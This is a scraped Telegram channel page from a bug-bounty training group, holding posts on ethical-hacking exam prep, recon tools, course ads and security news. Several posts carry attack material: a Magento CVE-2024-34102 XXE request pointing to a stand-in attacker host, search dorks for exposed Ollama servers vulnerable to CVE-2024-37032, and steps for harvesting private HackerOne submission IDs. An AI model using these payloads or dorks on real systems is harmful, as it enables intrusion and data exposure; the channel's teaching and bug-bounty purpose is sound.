Brut Security – Telegram
Brut Security
14.7K subscribers
911 photos
73 videos
287 files
969 links
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Download Telegram
ceh-v12-exam-set.pdf
1.6 MB
☄️Sharpen your skills for the Certified Ethical Hacker v12 exam with these practice questions☄️
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Subdomain Enumeration Tools UHD.pdf
127.4 KB
Subdomain Enumeration Tools

#bugbounty #bugbountytips
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🤡5🤣2🐳1🤝1
🔫Smap - passive Nmap like scanner built with shodan.io

😠Smap is a port scanner built with shodan.io's free API. It takes same command line arguments as Nmap and produces the same output which makes it a drop-in replacament for Nmap.

🤨 Read more: https://github.com/s0md3v/Smap

😐#infosec #cybersecurity #hacking #pentesting #security
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3❤‍🔥1
▶️This June Batch Filled with talented Students 🫶

👀July Batch Registration is Open
https://wa.me/message/NQLPOBIAEFDBN1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯1
Looking for someone who can contribute on the next 30 days Bug Bounty Challenge.

Similar to this https://nas.io/brutsecurity
🚨CVE-2024-37032: Probllama—Ollama Remote Code Execution Vulnerability

⚠️The issue relates to a case of insufficient input validation that results in a path traversal flaw. An attacker could exploit to overwrite arbitrary files on the server and ultimately lead to remote code execution.

🔥PoC:
https://lnkd.in/gk6Wvq_P

💥Dorks:
Hunter: /
product.name="Ollama Web"
FOFA: app="Ollama-Web"
🔥1
🛡Join The Discussion Group
🔗https://news.1rj.ru/str/brutsec
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE-2024-34102 POC

POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}
👍8
IDOR on HackerOne Embedded Submission Form 💰 💲
-
Steps to reproduce (obtaining inactive UUID of many private programs)

1- Use this command echo 'https://hackerone.com/' | waybackurls > lists.txt make sure you have waybackurls installed on your attackbox
2- cat lists.txt | grep "embedded_submissions" > results.txt
3- cat results.txt
4- You will find a lot of embedded submission id of many random private programs, you can check it by browsing each URL
-
https://lnkd.in/drCHC6qA
-
By @japzdivino
https://x.com/japzdivino
👍3
China now has their own GitHub/public Git repository hosting service called GitCode; it is owned and operated by CSDN under the company name "重庆开源共创科技有限公司"

It is being reported that many users' repository are being cloned and re-hosted on GitCode without authorization - meaning your project may very well be on this service without you explicitly allowing.

tldr: GitCode or China is attempting to mirror/clone the entire GitHub over to their own servers and there's nothing you can do about it, even if your license somehow disagrees with it.

Credit: https://x.com/azakasekai_/status/1805844941438075163?s=46&t=GxBcd0lJbjtL_W3TmBw-tA


#github #gitcode
🐳3👍1
Brut Security
Looking for someone who can contribute on the next 30 days Bug Bounty Challenge. Similar to this https://nas.io/brutsecurity
⚠️As I have asked everyone, I will elaborate it more here:

🌐That we need contributors who want to contribute for 30 days Bug Bounty Challenge. Where the participants can Learn from day 1 to day 30 , as there would be guidance have to provide. e.g:
Day 1: Run Subfinder
Day 2: Scrap Js
Day 3: Report etc. till day 30.

🙂If you want to collaborate or participate make a Day 1 to Day30 challenge or a topic, DM it to me @wtf_brut or you can DM here 🔽
Please open Telegram to view this post
VIEW IN TELEGRAM
⚠️No Foul Language Will Be Tolerated in the Comments or in the community discussion⚠️
Please open Telegram to view this post
VIEW IN TELEGRAM
Brut Security pinned «💥Join Our Bugbounty Discussion Group 💥 🔥https://news.1rj.ru/str/brutsec🔥 🤖https://discord.gg/GZBsQMY6🤖»
⚔️Pentest-Windows
🔰Windows11 Penetration Suite Toolkit

📌A Windows penetration testing environment that works out of the box.

⚠️This project was created for educational purposes and should not be used in environments without legal authorization.

🔗Link: https://lnkd.in/gtX3GbR8

🔖#infosec #cybersecurity #hacking #pentesting #security #infosec #cybersecurity #hacking #pentesting #security #oscp #ceh #nmap #infosec #hackingtools #networksecurity
🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
📢You can now passively enumerate all endpoints of a website with katana. (No need waybackurls)

📝Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints



🚨You can then check the status of these endpoints or filter in order to find new vulnerabilities:

Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints
👍2🔥1